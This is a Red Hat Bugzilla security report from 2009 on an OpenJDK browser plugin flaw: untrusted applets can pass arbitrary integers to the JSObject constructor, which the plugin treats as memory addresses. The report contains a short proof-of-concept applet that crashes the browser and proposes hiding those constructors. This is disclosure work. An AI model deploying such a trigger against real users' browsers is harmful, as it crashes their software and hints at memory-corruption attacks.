Bug 512714 - OpenJDK JSObject constructor crashing browser plugin
Summary: OpenJDK JSObject constructor crashing browser plugin
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
 
Reported: 2009-07-20 14:13 UTC by Marc Schoenefeld
Modified: 2019-09-29 12:30 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2016-09-09 02:24:10 UTC
Embargoed:



Description Marc Schoenefeld 2009-07-20 14:13:58 UTC
import java.applet.Applet;
import netscape.javascript.JSObject;

public class TestApplet extends Applet {
        public static void main(String[] a) {
        }

        public void init() {
                // The int/long constructor argument is taken by the plugin as a raw native address
                JSObject i = new JSObject(Integer.MAX_VALUE);
                JSObject j = new JSObject(Long.MAX_VALUE);
                // getMember dereferences that address, which crashes the browser
                i.getMember("Willi");
                j.getMember("Willi");
        }
}

segfaults the browser. The parameter to JSObject is interpreted as a memory location, and a getMember call accesses it. Giving this functionality to untrusted 

Affects: 
F10, F11

Proposed fix: 
Remove public visibility of JSObject(long) and JSObject(int)

